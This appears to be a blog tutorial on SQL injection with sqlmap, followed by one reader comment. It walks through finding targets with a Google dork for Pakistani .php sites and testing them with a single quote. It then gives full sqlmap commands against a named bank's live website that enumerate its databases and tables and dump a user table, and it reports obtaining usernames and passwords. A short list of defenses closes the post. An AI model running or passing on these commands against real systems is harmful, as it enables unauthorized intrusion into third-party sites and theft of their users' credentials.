SQL Injection Using SQLMAP
Requirements:
SQLMAP Script (Download)
Python Compiler
STEP 1:
Identifying the target :
Use Google dork to find the target, search for the following-
inurl:.php?id= site:.pk
STEP 2:
Checking for the vulnerability in the URL by passing ' (single quote)
If it returns ERROR then its hack-able.
STEP 3:
Open up the power shell and navigate to the folder where sqlmap is kept.
STEP 4:
Finding out the name of the databases available. Type the following command in Power Shell:
python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs
STEP 5:
Finding out the Tables in it. Type the following command:
python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" -D fcibankc_fci_urdu --tables
STEP 6:
Dumping the DATA inside Table (any table of your interest)
Type the following command:
python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" -D fcibankc_fci_urdu --T user --dump
We got the username and password.
Sql injection prevention techniques:
Primary Defenses:
Option 1: Use of Prepared Statements (with Parameterized Queries)
Option 2: Use of Stored Procedures
Option 3: Whitelist Input Validation
Option 4: Escaping All User Supplied Input
Additional Defenses:
Also: Enforcing Least Privilege
Also: Performing Whitelist Input Validation as a Secondary Defense
Thanks, very informative video :)
ReplyDelete